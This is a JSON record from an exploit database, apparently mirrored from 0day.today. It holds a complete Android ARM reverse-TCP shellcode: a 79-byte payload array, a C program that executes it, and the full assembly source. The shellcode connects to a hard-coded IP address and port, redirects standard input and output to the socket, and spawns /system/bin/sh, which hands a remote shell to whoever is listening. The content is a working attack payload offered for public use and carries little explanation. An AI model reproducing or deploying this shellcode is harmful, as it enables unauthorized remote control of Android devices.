{"sourceData": "/* This ARM Thumb sc connects to a given IP and port with a shell.\r\n * Intended for use with Android (hence /system/bin/sh).\r\n *\r\n * Connects to the provided IP and port with a shell\r\n *\r\n * no null bytes in the code, but does this really matter these days?\r\n * it could be fixed with just a few instructions.\r\n *\r\n * Released to the public domain */\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\n#define SWAP16(x) ((x) << 8 | ((x) >> 8))\r\n \r\nconst unsigned char sc[] = {\r\n /* Enter Thumb mode (for proof of concept) */\r\n 0x01, 0x10, 0x8F, 0xE2, 0x11, 0xFF, 0x2F, 0xE1,\r\n \r\n /* 16-bit instructions follow */\r\n 0x02, 0x20, 0x01, 0x21, 0x92, 0x1A, 0x0F, 0x02, 0x19, 0x37, 0x01,\r\n 0xDF, 0x06, 0x1C, 0x08, 0xA1, 0x10, 0x22, 0x02, 0x37, 0x01, 0xDF,\r\n 0x3F, 0x27, 0x02, 0x21, 0x30, 0x1c, 0x01, 0xdf, 0x01, 0x39, 0xFB,\r\n 0xD5, 0x05, 0xA0, 0x92, 0x1a, 0x05, 0xb4, 0x69, 0x46, 0x0b, 0x27,\r\n 0x01, 0xDF, 0xC0, 0x46,\r\n \r\n /* struct sockaddr */\r\n 0x02, 0x00,\r\n /* port: 0x1234 */\r\n 0x12, 0x34,\r\n /* ip: 10.0.2.2 */\r\n 0x0A, 0x00, 0x02, 0x02,\r\n \r\n /* \"/system/bin/sh\" */\r\n 0x2f, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2f, 0x62, 0x69, 0x6e,\r\n 0x2f, 0x73, 0x68, 0x00\r\n};\r\n \r\nint main()\r\n{\r\n printf(\"shellcode=%d bytes\\n\"\r\n \"connecting to %d.%d.%d.%d:%hd\\n\", sizeof sc,\r\n sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f],\r\n SWAP16(*((unsigned short *)(sc+0x3a))));\r\n return ((int (*)(void))sc)();\r\n}\r\n \r\n/*\r\n * Assembly for those who are interested \r\n *\r\n \r\n# switch to Thumb mode (16-bit ops) \r\n .code 32\r\n add r1, pc, #1\r\n bx r1\r\n \r\n# Thumb instructions follow\r\n .code 16\r\n \r\n# socket(2, 1, 0)\r\n mov r0, #2\r\n mov r1, #1\r\n sub r2, r2, r2\r\n lsl r7, r1, #8\r\n add r7, r7, #25\r\n svc 1\r\n \r\n# connect(r0, &addr, 16)\r\n mov r6, r0\r\n add r1, pc, #32\r\n mov r2, #16\r\n add r7, #2\r\n svc 1\r\n \r\n# dup2(r0, 0/1/2)\r\n mov r7, #63\r\n mov r1, #2\r\nLb:\r\n mov r0, r6\r\n svc 1\r\n sub r1, #1\r\n bpl Lb\r\n \r\n# execve(\"/system/bin/sh\", [\"/system/bin/sh\", 0], 0) \r\n add r0, pc, #20\r\n sub r2, r2, r2\r\n push {r0, r2}\r\n mov r1, sp\r\n mov r7, #11\r\n svc 1\r\n \r\n# struct sockaddr \r\n.align 2\r\n.short 0x2\r\n.short 0x3412 # port \r\n.byte 10,0,2,2 # IP\r\n.ascii \"/system/bin/sh\\0\\0\" # shell\r\n \r\n***/\n\n# 0day.today [2018-04-10] #", "description": "Exploit for amr platform in category shellcode", "sourceHref": "https://0day.today/exploit/29462", "reporter": "Neil Klopfenstein", "href": "https://0day.today/exploit/description/29462", "type": "zdt", "viewCount": 16, "references": [], "lastseen": "2018-04-10T01:46:34", "published": "2018-01-12T00:00:00", "cvelist": [], "id": "1337DAY-ID-29462", "modified": "2018-01-12T00:00:00", "title": "Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-04-10T01:46:34", "rev": 2}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-33556", "1337DAY-ID-22309", "1337DAY-ID-29429"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_PIXEL_BENDER_BOF", "MSF:EXPLOIT/MULTI/FILEFORMAT/GHOSTSCRIPT_FAILED_RESTORE", "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE_EVENT_PROCESSING_UPLOAD", "MSF:EXPLOIT/LINUX/HTTP/ALIENVAULT_SQLI_EXEC", "MSF:POST/FIREFOX/GATHER/HISTORY", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_UNCOMPRESS_ZLIB_UAF", "MSF:EXPLOIT/ANDROID/LOCAL/FUTEX_REQUEUE", "MSF:EXPLOIT/WINDOWS/HTTP/COGENT_DATAHUB_COMMAND", "MSF:AUXILIARY/DOS/WIRESHARK/CAPWAP", "MSF:EXPLOIT/WINDOWS/SCADA/YOKOGAWA_BKFSIM_VHFD"]}, {"type": "nessus", "idList": ["SUSE_WIRESHARK-8659.NASL", "DEBIAN_DSA-2709.NASL", "SUSE_SU-2013-1276-1.NASL", "SUSE_11_WIRESHARK-130711.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126848"]}, {"type": "exploitdb", "idList": ["EDB-ID:33556"]}], "modified": "2018-04-10T01:46:34", "rev": 2}, "vulnersScore": -0.8}, "immutableFields": []}

{}